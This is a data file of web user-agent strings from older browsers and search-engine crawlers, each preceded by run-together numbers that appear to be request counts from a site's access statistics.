870848Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
868856Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)
866858Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
866866Knight/0.2 (Zook Knight; http://knight.zook.in/; knight@zook.in)
865775Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
858818Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Media Center PC 5.0)
851841Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)
849809findfiles.net/0.97 (Robot;test_robot@gmx-topmail.de)
848819Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
846836Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; InfoPath.2; [xSP_2:10668b9963e3322796bd56166bb7c275_195]; 977904803)
846831Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
842834Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
831792Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0C)
826823Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)
825820panscient.com
820820Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=1942867011920659746)
820820AppleSyndication/56.1
816764Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
816731Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
809725Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
808694Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; .NET4.0C)
805778Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
803770Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
798798Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; byond_4.0; InfoPath.1)
797743Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
793781Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
788755Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
787775Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)
783771Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
783750Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 1.1.4322)
781781Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
781781RedBot/redbot-1.0 (Rediff.com Crawler; redbot at rediff dot com)
781778Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
772723Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
769748Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
768740Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)
763688Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
762761Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)
756739Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1
755755bot/1.0 (bot; http://; bot@bot.bot)
754664Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
750750psycheclone
744713Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
742739Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
738714Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)
736709Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
735727Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 1.1.4322)
733733Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)
730718Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)
730687ConveraCrawler/0.9d (+http://www.authoritativeweb.com/crawl)
728727UbiCrawler/v0.4beta (http://gii.nagaokaut.ac.jp/~ubi/)
728561Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
727724Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.1.4322 yplus 4.1.00b)
727670Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
726688Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.2)
724724Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)
723693Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
722711Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
720552Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
719709Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)
718713Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; InfoPath.2; [xSP_2:10668b9963e3322796bd56166bb7c275_195]; 977904803)
717628Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF; .NET4.0C)
713225Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
712710Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
710710Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)
707706Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2
705702Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
704686Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0)
701650Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
699690Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; SV1)
699640Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915
698683Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322)
697671Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
696659Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)
696694Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; byond_4.0; .NET CLR 1.1.4322)
695648Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
694609Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)
693644Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)
691691Apple-PubSub/65.19
691690Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
689687Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50
686683Java/1.6.0_26
685677Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
684611Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
682682Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1
679607Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; InfoPath.2; .NET4.0C)
679652Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
678649Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
676658Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
676676Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
673547Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)
672660Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3
672651Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
671668Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
668242Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0
667656Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5)
666666Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IPMS/4669080A-14AF91D9EAE; TCO_20091110170859; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
662640Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)
660636Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
659659Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SpamBlockerUtility 4.8.4)
650649Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
648613Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10
648637Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
647588Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
646611Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 3.5.30729)
642624Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
641616Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
638582Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
635569Mozilla/4.0 (compatible; KeepNI web site monitor)
634624Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 ( .NET CLR 3.5.30729)
632617Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 (.NET CLR 3.5.30729)
632608woriobot (+http://www.worio.com/)
630601Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
626600Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9
622622voyager/1.0
619601Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB0.0; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
616579Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
616614Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
616585Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
614554Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
614562Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
607590Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)
605564Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
603603SBIder/0.8-dev (SBIder; http://www.sitesell.com/sbider.html; http://support.sitesell.com/contact-support.html)
601578Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; byond_4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
599569Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.127 Safari/533.4
596523Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
594594CamontSpider/1.0 +http://epweb2.ph.bham.ac.uk/user/slater/camont/info.html
593583Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
590569Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)
588588Sogou web spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)
584240Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729)
584583Java/1.5.0_04
581581Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
579542Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; .NET4.0C)
579567Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts)
576561Mozilla/5.0 (compatible; Bender; http://benderthewebrobot.tumblr.com)
573563Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)
571550Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
570570WhatsUp Professional/1.0
570483Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0)
569433Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)
567567Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)
566562Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3
564563Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3
563535Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
563563firefox 3.0
563560Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
562552Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
560560Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; SpamBlockerUtility 4.8.4)
559532Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13
555508Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
554519Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
553547Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
547542Java/1.5.0_09
544480Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
543539Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
540521Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
539468yacybot (i386 Linux 2.6.22-14-generic; java 1.5.0_13; GMT+01:00/en) http://yacy.net/bot.html
53853Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
536409Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.127 Safari/533.4
535494Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)
535528Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
534534Apple-PubSub/65
532531Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; yplus 5.1.02b)
529525Mozilla/4.0 (compatible; MSIE 5.22; Mac_PowerPC)
525494Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727)
524523MSR-ISRCCrawler
522521Mozilla/5.0 (compatible; ptd-crawler; +http://bixolabs.com/crawler/ptd/; crawler@bixolabs.com)
521518Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
521501Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
520515Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)
518512Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
516506Java/1.4.2_04
515249Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
513503Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729)
510479Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
508484Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)
507505Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; SV1; .NET CLR 1.1.4322)
505483Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)
505505Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
505503Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2
502502Yandex/1.01.001 (compatible; Win16; H)
502502bzBot/0.5-dev (BusyBot Event Crawler; http://busytonight.com/about/bot.html; +)
497497Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)
497448Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
495475Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
494489Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; yplus 5.1.02b)
493490Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0)
490444Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729)
490485Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705)
485484Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)
484472Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
481454Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
479473Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)
477456Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
476439Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061023 SUSE/2.0.0.5-1.1 Firefox/2.0.0.5
476466Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
473472Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
472432Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322)
471462Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1
470407Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET4.0C; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
469457Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)
467338Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 (.NET CLR 3.5.30729)
466462Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 ( .NET CLR 3.5.30729) 668604703 Version/12.00289
465450Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
